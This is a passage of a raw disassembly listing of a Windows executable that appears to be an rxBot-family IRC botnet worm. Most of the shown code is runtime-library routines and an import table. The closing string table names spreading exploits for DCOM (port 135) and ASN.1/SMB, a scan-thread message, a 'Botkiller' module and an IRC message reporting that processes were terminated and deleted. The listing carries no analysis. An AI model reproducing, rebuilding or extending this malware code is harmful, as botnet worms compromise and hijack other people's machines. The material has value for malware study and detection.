and edi, 80000000h
add edi, 7FFF8000h
and dword ptr [esi], 0
mov [esi+8], edi
loc_417B9D: ; CODE XREF: sub_417975+B8�j
; sub_417975+20B�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop edi
pop esi
pop ebx
call sub_411BA5
leave
retn
sub_417975 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417BAD proc near ; CODE XREF: sub_416F96+3F2�p
; sub_417423+144�p
var_10 = byte ptr -10h
var_E = dword ptr -0Eh
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, dword_421360
xor eax, [ebp+4]
push ebx
mov ebx, offset dword_421798
xor ecx, ecx
sub ebx, 60h
cmp [ebp+arg_4], ecx
mov [ebp+var_4], eax
jz short loc_417C2B
jge short loc_417BDB
neg [ebp+arg_4]
mov ebx, offset dword_4218F8
sub ebx, 60h
loc_417BDB: ; CODE XREF: sub_417BAD+21�j
cmp [ebp+arg_8], ecx
jnz short loc_417BE6
mov eax, [ebp+arg_0]
mov [eax], cx
loc_417BE6: ; CODE XREF: sub_417BAD+31�j
cmp [ebp+arg_4], ecx
jz short loc_417C2B
push esi
push edi
loc_417BED: ; CODE XREF: sub_417BAD+7A�j
mov eax, [ebp+arg_4]
sar [ebp+arg_4], 3
and eax, 7
add ebx, 54h
cmp eax, ecx
jz short loc_417C24
lea eax, [eax+eax*2]
lea esi, [ebx+eax*4]
cmp word ptr [esi], 8000h
jb short loc_417C17
lea edi, [ebp+var_10]
movsd
movsd
movsd
dec [ebp+var_E]
lea esi, [ebp+var_10]
loc_417C17: ; CODE XREF: sub_417BAD+5C�j
push esi
push [ebp+arg_0]
call sub_417975
pop ecx
pop ecx
xor ecx, ecx
loc_417C24: ; CODE XREF: sub_417BAD+4F�j
cmp [ebp+arg_4], ecx
jnz short loc_417BED
pop edi
pop esi
loc_417C2B: ; CODE XREF: sub_417BAD+1F�j
; sub_417BAD+3C�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop ebx
call sub_411BA5
leave
retn
sub_417BAD endp
; =============== S U B R O U T I N E =======================================
sub_417C39 proc near ; CODE XREF: sub_4176B7+96�p
; sub_4176B7+E4�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
cmp eax, dword_4C5DA0
push esi
jnb short loc_417CA1
mov ecx, eax
sar ecx, 5
mov ecx, dword_4C5DC0[ecx*4]
and eax, 1Fh
lea edx, [ecx+eax*8+4]
mov cl, [edx]
test cl, 1
jz short loc_417CA1
xor eax, eax
mov al, cl
mov esi, 8000h
and eax, 80h
cmp [esp+4+arg_4], esi
jnz short loc_417C79
and cl, 7Fh
jmp short loc_417C86
; ---------------------------------------------------------------------------
loc_417C79: ; CODE XREF: sub_417C39+39�j
cmp [esp+4+arg_4], 4000h
jnz short loc_417C95
or cl, 80h
loc_417C86: ; CODE XREF: sub_417C39+3E�j
neg eax
sbb eax, eax
and eax, 0FFFFC000h
add eax, esi
mov [edx], cl
pop esi
retn
; ---------------------------------------------------------------------------
loc_417C95: ; CODE XREF: sub_417C39+48�j
mov dword_4C5904, 16h
jmp short loc_417CAB
; ---------------------------------------------------------------------------
loc_417CA1: ; CODE XREF: sub_417C39+B�j
; sub_417C39+25�j
mov dword_4C5904, 9
loc_417CAB: ; CODE XREF: sub_417C39+66�j
or eax, 0FFFFFFFFh
pop esi
retn
sub_417C39 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_417CB0 proc near ; CODE XREF: sub_40AB64+4A�p
jmp dword_4191F8
sub_417CB0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_417CB6 proc near ; CODE XREF: sub_40AB64+33�p
jmp dword_4191F4
sub_417CB6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_417CBC proc near ; CODE XREF: sub_40AB64+E�p
jmp dword_4191F0
sub_417CBC endp
; =============== S U B R O U T I N E =======================================
sub_417CC2 proc near ; CODE XREF: sub_417D91+25�p
; sub_417E2C+25�p
mov eax, offset loc_418037
call sub_40F234
push ecx
push esi
mov esi, ecx
mov [ebp-10h], esi
call sub_417F23
push dword ptr [ebp+8]
and dword ptr [ebp-4], 0
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_41C890
call sub_40C5D6
mov ecx, [ebp-0Ch]
mov eax, esi
pop esi
mov large fs:0, ecx
leave
retn 4
sub_417CC2 endp
; =============== S U B R O U T I N E =======================================
sub_417CFE proc near ; DATA XREF: .text:0041C894�o
; .text:0041C8A0�o ...
cmp dword ptr [ecx+24h], 10h
jb short loc_417D08
mov eax, [ecx+10h]
retn
; ---------------------------------------------------------------------------
loc_417D08: ; CODE XREF: sub_417CFE+4�j
lea eax, [ecx+10h]
retn
sub_417CFE endp
; =============== S U B R O U T I N E =======================================
sub_417D0C proc near ; CODE XREF: .text:00417D2A�p
; sub_417D5F+6�j ...
push esi
mov esi, ecx
push 1
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_41C890
call sub_40C18A
mov ecx, esi
pop esi
jmp sub_417F7E
sub_417D0C endp
; ---------------------------------------------------------------------------
loc_417D27: ; DATA XREF: .text:off_41C890�o
push esi
mov esi, ecx
call sub_417D0C
test byte ptr [esp+8], 1
jz short loc_417D3D
push esi
call sub_40F6C1
pop ecx
loc_417D3D: ; CODE XREF: .text:00417D34�j
mov eax, esi
pop esi
retn 4
; ---------------------------------------------------------------------------
loc_417D43: ; DATA XREF: .text:off_41C89C�o
push esi
mov esi, ecx
call sub_417D5F
test byte ptr [esp+8], 1
jz short loc_417D59
push esi
call sub_40F6C1
pop ecx
loc_417D59: ; CODE XREF: .text:00417D50�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_417D5F proc near ; CODE XREF: .text:00417D46�p
; DATA XREF: .text:0041CC98�o
mov dword ptr [ecx], offset off_41C89C
jmp sub_417D0C
sub_417D5F endp
; ---------------------------------------------------------------------------
loc_417D6A: ; DATA XREF: .text:off_41C8A8�o
push esi
mov esi, ecx
call sub_417D86
test byte ptr [esp+8], 1
jz short loc_417D80
push esi
call sub_40F6C1
pop ecx
loc_417D80: ; CODE XREF: .text:00417D77�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_417D86 proc near ; CODE XREF: .text:00417D6D�p
; DATA XREF: .text:0041CC14�o
mov dword ptr [ecx], offset off_41C8A8
jmp sub_417D0C
sub_417D86 endp
; =============== S U B R O U T I N E =======================================
sub_417D91 proc near ; CODE XREF: sub_40C2D9+13�p
; sub_40C36E+F�p ...
mov eax, offset loc_418025
call sub_40F234
sub esp, 44h
push offset aInvalidStringP ; "invalid string position"
lea ecx, [ebp-28h]
call sub_40C85D
and dword ptr [ebp-4], 0
lea eax, [ebp-28h]
push eax
lea ecx, [ebp-50h]
call sub_417CC2
push offset dword_41CC10
lea eax, [ebp-50h]
push eax
mov dword ptr [ebp-50h], offset off_41C8A8
call sub_40F6D4
int 3 ; Trap to Debugger
sub_417D91 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_417DD1 proc near ; CODE XREF: .text:00417E1B�p
; sub_417E2C+47�p
mov eax, offset loc_418037
call sub_40F234
push ecx
push esi
push edi
mov edi, [ebp+8]
mov esi, ecx
push edi
mov [ebp-10h], esi
call sub_417F34
and dword ptr [ebp-4], 0
add edi, 0Ch
push edi
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_41C890
call sub_40C5D6
mov ecx, [ebp-0Ch]
pop edi
mov eax, esi
pop esi
mov large fs:0, ecx
leave
retn 4
sub_417DD1 endp
; ---------------------------------------------------------------------------
push esi
push dword ptr [esp+8]
mov esi, ecx
call sub_417DD1
mov dword ptr [esi], offset off_41C8A8
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_417E2C proc near ; CODE XREF: sub_40C27D+D�p
; sub_40C2D9+32�p ...
var_40 = dword ptr -40h
mov eax, offset loc_418025
call sub_40F234
sub esp, 44h
push offset aStringTooLong ; "string too long"
lea ecx, [ebp-28h]
call sub_40C85D
and dword ptr [ebp-4], 0
lea eax, [ebp-28h]
push eax
lea ecx, [ebp-50h]
call sub_417CC2
push offset dword_41CC94
lea eax, [ebp-50h]
push eax
mov dword ptr [ebp-50h], offset off_41C89C
call sub_40F6D4
int 3 ; Trap to Debugger
push esi
push [esp+48h+var_40]
mov esi, ecx
call sub_417DD1
mov dword ptr [esi], offset off_41C89C
mov eax, esi
pop esi
retn 4
sub_417E2C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_417E84 proc near ; CODE XREF: sub_40EE3F+24�p
; sub_40F144+13�p
jmp dword_4191BC
sub_417E84 endp
; =============== S U B R O U T I N E =======================================
sub_417E8A proc near ; CODE XREF: sub_417EC8+1E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_4], 0
jz short loc_417E97
mov byte ptr [ecx], 2Dh
inc ecx
neg eax
loc_417E97: ; CODE XREF: sub_417E8A+5�j
push esi
mov esi, ecx
loc_417E9A: ; CODE XREF: sub_417E8A+28�j
xor edx, edx
div [esp+4+arg_0]
cmp edx, 9
jbe short loc_417EAA
add dl, 57h
jmp short loc_417EAD
; ---------------------------------------------------------------------------
loc_417EAA: ; CODE XREF: sub_417E8A+19�j
add dl, 30h
loc_417EAD: ; CODE XREF: sub_417E8A+1E�j
mov [ecx], dl
inc ecx
test eax, eax
ja short loc_417E9A
and byte ptr [ecx], 0
dec ecx
loc_417EB8: ; CODE XREF: sub_417E8A+3A�j
mov dl, [esi]
mov al, [ecx]
mov [ecx], dl
dec ecx
mov [esi], al
inc esi
cmp esi, ecx
jb short loc_417EB8
pop esi
retn
sub_417E8A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417EC8 proc near ; CODE XREF: .text:00409E5D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 0Ah
mov eax, [ebp+arg_0]
jnz short loc_417EDE
test eax, eax
jge short loc_417EDE
push 1
push 0Ah
jmp short loc_417EE3
; ---------------------------------------------------------------------------
loc_417EDE: ; CODE XREF: sub_417EC8+A�j
; sub_417EC8+E�j
push 0
push [ebp+arg_8]
loc_417EE3: ; CODE XREF: sub_417EC8+14�j
mov ecx, [ebp+arg_4]
call sub_417E8A
mov eax, [ebp+arg_4]
pop ecx
pop ecx
pop ebp
retn
sub_417EC8 endp
; =============== S U B R O U T I N E =======================================
sub_417EF2 proc near ; CODE XREF: .text:00417F0A�p
mov dword ptr [ecx], offset off_41C8DC
mov ecx, [ecx+4]
test ecx, ecx
jz short locret_417F06
push ecx
call sub_40E359
pop ecx
locret_417F06: ; CODE XREF: sub_417EF2+B�j
retn
sub_417EF2 endp
; ---------------------------------------------------------------------------
loc_417F07: ; DATA XREF: .text:off_41C8DC�o
push esi
mov esi, ecx
call sub_417EF2
test byte ptr [esp+8], 1
jz short loc_417F1D
push esi
call sub_40F6C1
pop ecx
loc_417F1D: ; CODE XREF: .text:00417F14�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_417F23 proc near ; CODE XREF: sub_417CC2+11�p
mov eax, ecx
and dword ptr [eax+4], 0
and dword ptr [eax+8], 0
mov dword ptr [eax], offset off_41C8E4
retn
sub_417F23 endp
; =============== S U B R O U T I N E =======================================
sub_417F34 proc near ; CODE XREF: sub_417DD1+16�p
arg_0 = dword ptr 4
push esi
mov esi, ecx
push edi
mov edi, [esp+8+arg_0]
mov dword ptr [esi], offset off_41C8E4
mov eax, [edi+8]
test eax, eax
mov [esi+8], eax
jz short loc_417F71
push dword ptr [edi+4]
call sub_40D630
inc eax
push eax
call sub_40E74F
test eax, eax
pop ecx
pop ecx
mov [esi+4], eax
jz short loc_417F77
push dword ptr [edi+4]
push eax
call sub_40D8A0
pop ecx
pop ecx
jmp short loc_417F77
; ---------------------------------------------------------------------------
loc_417F71: ; CODE XREF: sub_417F34+16�j
mov eax, [edi+4]
mov [esi+4], eax
loc_417F77: ; CODE XREF: sub_417F34+2E�j
; sub_417F34+3B�j
pop edi
mov eax, esi
pop esi
retn 4
sub_417F34 endp
; =============== S U B R O U T I N E =======================================
sub_417F7E proc near ; CODE XREF: sub_417D0C+16�j
; .text:00417FA4�p ...
cmp dword ptr [ecx+8], 0
mov dword ptr [ecx], offset off_41C8E4
jz short locret_417F93
push dword ptr [ecx+4]
call sub_40E359
pop ecx
locret_417F93: ; CODE XREF: sub_417F7E+A�j
retn
sub_417F7E endp
; =============== S U B R O U T I N E =======================================
sub_417F94 proc near ; DATA XREF: .text:0041C8E8�o
mov eax, [ecx+4]
test eax, eax
jnz short locret_417FA0
mov eax, offset aUnknownExcepti ; "Unknown exception"
locret_417FA0: ; CODE XREF: sub_417F94+5�j
retn
sub_417F94 endp
; ---------------------------------------------------------------------------
loc_417FA1: ; DATA XREF: .text:off_41C8E4�o
push esi
mov esi, ecx
call sub_417F7E
test byte ptr [esp+8], 1
jz short loc_417FB7
push esi
call sub_40F6C1
pop ecx
loc_417FB7: ; CODE XREF: .text:00417FAE�j
mov eax, esi
pop esi
retn 4
; ---------------------------------------------------------------------------
lea ecx, [ebp+8]
jmp loc_40974F
; ---------------------------------------------------------------------------
loc_417FC5: ; DATA XREF: .text:0041CA84�o
lea ecx, [ebp-14h]
jmp loc_40974F
; ---------------------------------------------------------------------------
lea ecx, [ebp-18h]
jmp loc_40974F
; ---------------------------------------------------------------------------
lea ecx, [ebp-1Ch]
jmp loc_40974F
; ---------------------------------------------------------------------------
loc_417FDD: ; DATA XREF: .text:loc_409772�o
mov eax, offset dword_41CA98
jmp loc_40EE91
; ---------------------------------------------------------------------------
loc_417FE7: ; DATA XREF: sub_40C1BF�o
mov eax, offset dword_41CB1C
jmp loc_40EE91
; ---------------------------------------------------------------------------
lea ecx, [ebp-38h]
jmp loc_40C1B7
; ---------------------------------------------------------------------------
loc_417FF9: ; DATA XREF: sub_40C62F�o
mov eax, offset dword_41CB40
jmp loc_40EE91
; ---------------------------------------------------------------------------
lea ecx, [ebp+14h]
jmp loc_40C1B7
; ---------------------------------------------------------------------------
loc_41800B: ; DATA XREF: .text:0041CB68�o
lea ecx, [ebp-28h]
jmp loc_40C1B7
; ---------------------------------------------------------------------------
loc_418013: ; DATA XREF: sub_40C7B0�o
mov eax, offset dword_41CB6C
jmp loc_40EE91
; ---------------------------------------------------------------------------
lea ecx, [ebp-28h]
jmp loc_40C1B7
; ---------------------------------------------------------------------------
loc_418025: ; DATA XREF: sub_417D91�o sub_417E2C�o
mov eax, offset dword_41CC28
jmp loc_40EE91
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
jmp sub_417F7E
; ---------------------------------------------------------------------------
loc_418037: ; DATA XREF: sub_417CC2�o sub_417DD1�o
mov eax, offset dword_41CC4C
jmp loc_40EE91
; =============== S U B R O U T I N E =======================================
sub_418041 proc near ; DATA XREF: .text:0041E008�o
push 0BB80h
push 76Ch
call sub_408964
pop ecx
pop ecx
mov dword_4C58B8, eax
retn
sub_418041 endp
; ---------------------------------------------------------------------------
align 10h
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 8
push offset loc_40F852
push offset nullsub_1
mov eax, offset nullsub_2
jmp eax
; ---------------------------------------------------------------------------
align 4
dd 3E1h dup(0)
dword_419000 dd 77DD23D7h ; DATA XREF: sub_405E94+75�r
; sub_407C63+4A�r
dword_419004 dd 77DDACABh ; DATA XREF: sub_404BAB+E6�r
; sub_40A610+19F�r
dword_419008 dd 77DD590Bh ; DATA XREF: start+2D�r sub_404BAB+458�r
dword_41900C dd 77DD59F0h ; DATA XREF: start+48�r sub_404BAB+480�r
dword_419010 dd 77DD5C55h ; DATA XREF: start+55�r
dword_419014 dd 77DD189Ah ; DATA XREF: start+5F�r sub_404BAB+489�r ...
dword_419018 dd 77DD22EAh ; DATA XREF: sub_405E94+53�r
; sub_407C63+23�r
align 10h
dword_419020 dd 77E7C866h ; DATA XREF: sub_41512C+24�r
; sub_41512C+128�r
dword_419024 dd 77E641EBh ; DATA XREF: sub_41512C+19C�r
dword_419028 dd 77F522F2h ; DATA XREF: sub_4150F4+30�r
dword_41902C dd 77E7F044h ; DATA XREF: sub_414EC1+1A�r
; sub_414EC1+71�r
dword_419030 dd 77E7C3A5h ; DATA XREF: sub_414EC1+2B�r
dword_419034 dd 77E6169Ah ; DATA XREF: sub_414EC1+C3�r
dword_419038 dd 77E73FF9h ; DATA XREF: sub_414D0D+2C�r
dword_41903C dd 77E77EE1h ; DATA XREF: sub_414B11+B�r
dword_419040 dd 77E7C9E1h ; DATA XREF: sub_414B11+C1�r
dword_419044 dd 77E67702h ; DATA XREF: sub_414B11:loc_414BE8�r
dword_419048 dd 77E9C5B1h ; DATA XREF: sub_414B11+113�r
dword_41904C dd 77EB9A84h ; DATA XREF: sub_414662+167�r
dword_419050 dd 77E7C9E7h ; DATA XREF: sub_4143C1+5�r
; sub_4143D4+6�r
dword_419054 dd 77E781F9h ; DATA XREF: sub_412ED1+27�r
; sub_412ED1+15B�r ...
dword_419058 dd 77E79924h ; DATA XREF: sub_412ED1+22D�r
; sub_414B11:loc_414B80�r ...
dword_41905C dd 77E77405h ; DATA XREF: sub_412ED1+2C3�r
; sub_412ED1+344�r ...
dword_419060 dd 77E61BE6h ; DATA XREF: sub_401073+9A�r
; sub_401179+DC�r ...
dword_419064 dd 77E77963h ; DATA XREF: sub_401073+F7�r
; sub_401179+136�r ...
dword_419068 dd 77EBAAFAh ; DATA XREF: sub_40D610�r
dword_41906C dd 77E73628h ; DATA XREF: sub_401073+A7�r
; sub_404BAB+2E5�r ...
dword_419070 dd 77E616B4h ; DATA XREF: sub_401073+8F�r
; sub_409427+110�r ...
dword_419074 dd 77E706B7h ; DATA XREF: sub_401073+83�r
; sub_401179+4D�r ...
dword_419078 dd 77E70396h ; DATA XREF: sub_401073+73�r
; sub_404BAB+23A�r ...
dword_41907C dd 77EBA994h ; DATA XREF: sub_40D616�r
dword_419080 dd 77EBB1E7h ; DATA XREF: sub_40D61C�r
dword_419084 dd 77E61A54h ; DATA XREF: sub_401179+7D�r
; sub_4013E5+7B�r
dword_419088 dd 77EBA6E9h ; DATA XREF: sub_40D622�r
dword_41908C dd 77EBA595h ; DATA XREF: sub_40D628�r
dword_419090 dd 77E7A099h ; DATA XREF: sub_4012BA+21�r
; sub_40151D+21�r ...
dword_419094 dd 77E79F93h ; DATA XREF: sub_4012BA+1A�r
; sub_40151D+1A�r ...
dword_419098 dd 77E70F89h ; DATA XREF: sub_401648+C�r
dword_41909C dd 77E61BB8h ; DATA XREF: sub_40198E+24C9�r
; sub_404BAB+375�r ...
dword_4190A0 dd 77E6AD34h ; DATA XREF: sub_40198E+2301�r
; sub_404BAB+73�r ...
dword_4190A4 dd 77E76A2Eh ; DATA XREF: sub_40198E+191C�r
; sub_40198E+27A8�r ...
dword_4190A8 dd 77E7751Ah ; DATA XREF: sub_40198E+1216�r
; sub_404BAB+11�r ...
dword_4190AC dd 77F5157Dh ; DATA XREF: sub_40198E+113A�r
; sub_40198E+136C�r ...
dword_4190B0 dd 77E7AC37h ; DATA XREF: sub_40198E+111E�r
; sub_40198E+1350�r ...
dword_4190B4 dd 77E704FCh ; DATA XREF: sub_40198E+104E�r
; sub_404901+173�r ...
dword_4190B8 dd 77E75CB5h ; DATA XREF: sub_404BAB:loc_404F46�r
; sub_4056A2+423�r ...
dword_4190BC dd 77E80656h ; DATA XREF: sub_404BAB+31C�r
; sub_4152E6+17�r
dword_4190C0 dd 77E6BD13h ; DATA XREF: sub_404BAB:loc_404DEB�r
dword_4190C4 dd 77E74CABh ; DATA XREF: sub_404BAB+223�r
; sub_40752D+10F�r ...
dword_4190C8 dd 77E76432h ; DATA XREF: sub_404BAB+F8�r
; .text:00409962�r ...
dword_4190CC dd 77E79D5Bh ; DATA XREF: sub_404BAB+8C�r
; sub_404BAB+2BF�r ...
dword_4190D0 dd 77E802FCh ; DATA XREF: sub_4152E6+33�r
dword_4190D4 dd 77E78C17h ; DATA XREF: sub_404BAB+2C�r
dword_4190D8 dd 77E73C49h ; DATA XREF: sub_4056A2+499�r
; sub_4073C5+161�r ...
dword_4190DC dd 77E79D8Ch ; DATA XREF: sub_4056A2+136�r
; sub_408B66+A6�r ...
dword_4190E0 dd 77E7A837h ; DATA XREF: sub_4056A2+5D�r
; sub_4072DA+25�r ...
dword_4190E4 dd 77E6C0E3h ; DATA XREF: sub_405BB7+4�r
dword_4190E8 dd 77E96645h ; DATA XREF: sub_405E21+12�r
dword_4190EC dd 77E80618h ; DATA XREF: sub_405FD6+1C�r
dword_4190F0 dd 77E805D8h ; DATA XREF: sub_40600B+60�r
; sub_407D3E+13A�r ...
dword_4190F4 dd 77E79C90h ; DATA XREF: sub_406231+42�r
; sub_4093BC+C�r ...
dword_4190F8 dd 77E7A5FDh ; DATA XREF: sub_406425:loc_4064D3�r
; sub_407D3E+11�r ...
dword_4190FC dd 77E78EAAh ; DATA XREF: sub_406C59+5ED�r
dword_419100 dd 77E79424h ; DATA XREF: sub_406C59+27A�r
dword_419104 dd 77E794BFh ; DATA XREF: sub_406C59+26C�r
dword_419108 dd 77E75E67h ; DATA XREF: sub_406C59+20C�r
; sub_406C59+5DC�r
dword_41910C dd 77E75D9Eh ; DATA XREF: sub_406C59+1FB�r
dword_419110 dd 77E78B82h ; DATA XREF: sub_4072DA+80�r
; sub_41050F+7F�r ...
dword_419114 dd 77E78C81h ; DATA XREF: sub_4072DA+6C�r
; sub_4134BF+43�r ...
dword_419118 dd 77E793EFh ; DATA XREF: sub_4072DA+38�r
; sub_40752D+1ED�r
dword_41911C dd 77E64106h ; DATA XREF: sub_4073C5+9B�r
dword_419120 dd 77E64006h ; DATA XREF: sub_4073C5+87�r
dword_419124 dd 77E75090h ; DATA XREF: sub_408995+6F�r
dword_419128 dd 77E74D76h ; DATA XREF: sub_408995+3B�r
dword_41912C dd 77E77797h ; DATA XREF: sub_408995+2A�r
dword_419130 dd 77E73CE2h ; DATA XREF: sub_408AC2+60�r
; sub_408EF0+109�r
dword_419134 dd 77E668D9h ; DATA XREF: sub_408B66+155�r
dword_419138 dd 77E7C657h ; DATA XREF: sub_408E61+16�r
; .text:00409D08�r ...
dword_41913C dd 77E77CCEh ; DATA XREF: sub_408EA9+1E�r
; sub_412ED1+C0�r ...
dword_419140 dd 77E73BEFh ; DATA XREF: .text:00409AA8�r
dword_419144 dd 77E73167h ; DATA XREF: .text:loc_40993A�r
dword_419148 dd 77E74672h ; DATA XREF: .text:004098E3�r
dword_41914C dd 77E7513Ch ; DATA XREF: .text:00409E8F�r
; sub_415FE6+23�r
dword_419150 dd 77E65F4Ch ; DATA XREF: sub_40A610+191�r
dword_419154 dd 77E76C1Ah ; DATA XREF: sub_40A610+C8�r
dword_419158 dd 77E75CEBh ; DATA XREF: sub_40A920+2A�r
dword_41915C dd 77F7E300h ; DATA XREF: sub_40AD8F+12E�r
dword_419160 dd 77F7E21Fh ; DATA XREF: sub_40AD8F+C5�r
dword_419164 dd 77E7C706h ; DATA XREF: sub_40AFA2+59�r
dword_419168 dd 77F53275h ; DATA XREF: sub_40AFA2+4D�r
; sub_40AFA2+21C�r
dword_41916C dd 77E73196h ; DATA XREF: sub_4162B9+C�r
dword_419170 dd 77F5722Fh ; DATA XREF: sub_412407+27�r
; sub_414F92+FD�r ...
dword_419174 dd 77E7980Ah ; DATA XREF: sub_412407+7E�r
; sub_4124BE+52�r ...
dword_419178 dd 77E79E34h ; DATA XREF: sub_4120EF+22F�r
dword_41917C dd 77E77CC4h ; DATA XREF: sub_4152E6+1F�r
dword_419180 dd 77E6167Bh ; DATA XREF: sub_4152E6+B�r
dword_419184 dd 77E7FF2Eh ; DATA XREF: sub_415EB9:loc_415F09�r
; sub_415F30:loc_415F83�r
dword_419188 dd 77E7339Ch ; DATA XREF: sub_41629D+C�r
dword_41918C dd 77E7176Ch ; DATA XREF: sub_4162D5+8�r
dword_419190 dd 77E70192h ; DATA XREF: sub_4176B7+104�r
dword_419194 dd 77E7C2C4h ; DATA XREF: sub_404BAB+85�r
dword_419198 dd 77E7011Ah ; DATA XREF: sub_408AC2+96�r
; sub_408EF0+45E�r
dword_41919C dd 77E7C726h ; DATA XREF: sub_41202B+11�r
dword_4191A0 dd 77E76E0Bh ; DATA XREF: sub_41202B+44�r
dword_4191A4 dd 77E7849Fh ; DATA XREF: sub_411692+1F�r
; sub_411824+96�r ...
dword_4191A8 dd 77E6C703h ; DATA XREF: sub_411824+2E�r
dword_4191AC dd 77E7A13Fh ; DATA XREF: sub_411824+45�r
dword_4191B0 dd 77E78406h ; DATA XREF: sub_410364+FE�r
; sub_410364+165�r ...
dword_4191B4 dd 77F51597h ; DATA XREF: sub_40E359+30�r
; sub_4120EF+2B4�r ...
dword_4191B8 dd 77F516F8h ; DATA XREF: sub_40E6DD+3E�r
; sub_410733+47�r ...
dword_4191BC dd 77F6183Eh ; DATA XREF: sub_417E84�r
dword_4191C0 dd 77E6D706h ; DATA XREF: sub_40F6D4+2E�r
; sub_416308+1F5�r
dword_4191C4 dd 77E6177Ah ; DATA XREF: .text:0040F9AF�r
; sub_410364+57�r
dword_4191C8 dd 77E7C938h ; DATA XREF: .text:loc_40F95E�r
dword_4191CC dd 77E7C931h ; DATA XREF: sub_410364+19C�r
dword_4191D0 dd 77E79C3Dh ; DATA XREF: sub_410364+157�r
; sub_4144B2+154�r
align 8
dword_4191D8 dd 77428B97h ; DATA XREF: sub_40198E+1EBC�r
; sub_4056A2+2ED�r
align 10h
dword_4191E0 dd 77D4C96Ah ; DATA XREF: .text:00409826�r
; .text:004098A4�r
dword_4191E4 dd 77D4BDCAh ; DATA XREF: sub_408995+D�r
dword_4191E8 dd 77D4702Fh ; DATA XREF: sub_408995+58�r
align 10h
dword_4191F0 dd 77C015E3h ; DATA XREF: sub_417CBC�r
dword_4191F4 dd 77C0162Dh ; DATA XREF: sub_417CB6�r
dword_4191F8 dd 77C0167Dh ; DATA XREF: sub_417CB0�r
align 10h
dword_419200 dd 76214750h ; DATA XREF: sub_4056A2+3A�r
dword_419204 dd 7620BD61h ; DATA XREF: sub_4056A2+108�r
dword_419208 dd 76204E4Dh ; DATA XREF: sub_4056A2+486�r
dword_41920C dd 7620AFB6h ; DATA XREF: sub_404BAB+3B�r
dd 0
dword_419214 dd 71AB1890h ; DATA XREF: sub_40BEF1+4C�r
dword_419218 dd 71AB1B7Bh ; DATA XREF: sub_40D60A�r
dword_41921C dd 71AB1746h ; DATA XREF: sub_40A29B+19F�r
; sub_40A29B+1B1�r
dword_419220 dd 71AB155Ah ; DATA XREF: sub_409EEB+6E�r
dword_419224 dd 71AB5690h ; DATA XREF: sub_40CA59+6C�r
; sub_40CCB2+18�r
dword_419228 dd 71AB8629h ; DATA XREF: .text:0040D2FE�r
dword_41922C dd 71AB157Eh ; DATA XREF: sub_408CE6+27�r
; sub_40A610+B1�r
dword_419230 dd 71AB41DAh ; DATA XREF: sub_404BAB+3F5�r
dword_419234 dd 71AB1746h ; DATA XREF: sub_404901+46�r
; sub_40CA59+35�r
dword_419238 dd 71AB3C22h ; DATA XREF: sub_404901+A9�r
; sub_409EEB+52�r ...
dword_41923C dd 71AB3E5Dh ; DATA XREF: sub_404901+C2�r
; sub_409EEB+88�r ...
dword_419240 dd 71AB1A6Dh ; DATA XREF: sub_404901+CE�r
; sub_404901+25C�r ...
dword_419244 dd 71AB1836h ; DATA XREF: sub_40198E+1504�r
; sub_404BAB:loc_4051E1�r ...
dword_419248 dd 71AB12F8h ; DATA XREF: sub_40198E+1F12�r
; sub_404901+57�r ...
dword_41924C dd 71ABD755h ; DATA XREF: sub_40198E+1F28�r
; sub_404901+7C�r
dword_419250 dd 71AB2BBFh ; DATA XREF: sub_40198E+1F37�r
; sub_404901+6C�r
dword_419254 dd 71AB401Ch ; DATA XREF: sub_40198E+1F48�r
; sub_40A29B+1E3�r ...
dword_419258 dd 71AB1AF4h ; DATA XREF: sub_401073+D9�r
; sub_401179+D1�r ...
align 10h
aSDScanThreadDS db '%s:%d, Scan thread: %d, Sub-thread: %d.',0 ; DATA XREF: .text:0041E0AC�o
; .text:0041E0D4�o
aDcom135 db 'dcom135',0 ; DATA XREF: .text:0041E0A4�o
aAsn1smb db 'asn1smb',0 ; DATA XREF: .text:off_41E09C�o
aR_x_b_o_t db 'R.X.B.o.t',0 ; DATA XREF: .text:0041E0A0�o
; .text:0041E0A8�o
align 4
aPrivmsgST3rmin db 'PRIVMSG %s :T3rmina3d and del3t3d %s',0Ah,0 ; DATA XREF: sub_401073+BD�o
align 4
aServices_exe db 'SERVICES.EXE',0 ; DATA XREF: sub_4012BA+46�o
; sub_40151D+46�o
align 4
aWinlogon_exe db 'WINLOGON.EXE',0 ; DATA XREF: sub_4012BA+3F�o
; sub_40151D+3F�o
align 4
aHidserv_exe db 'hidserv.exe',0 ; DATA XREF: sub_4012BA+38�o
; sub_40151D+38�o
aExplorer_exe db 'explorer.exe',0 ; DATA XREF: sub_4012BA+31�o
; sub_40151D+31�o ...
align 4
aFailedToStar_3 db 'Failed to start worker thread, error: <%d>.',0
; DATA XREF: .text:0041E0CC�o
aBotkiller db 'Botkiller',0 ; DATA XREF: .text:0041E0C4�o
align 10h
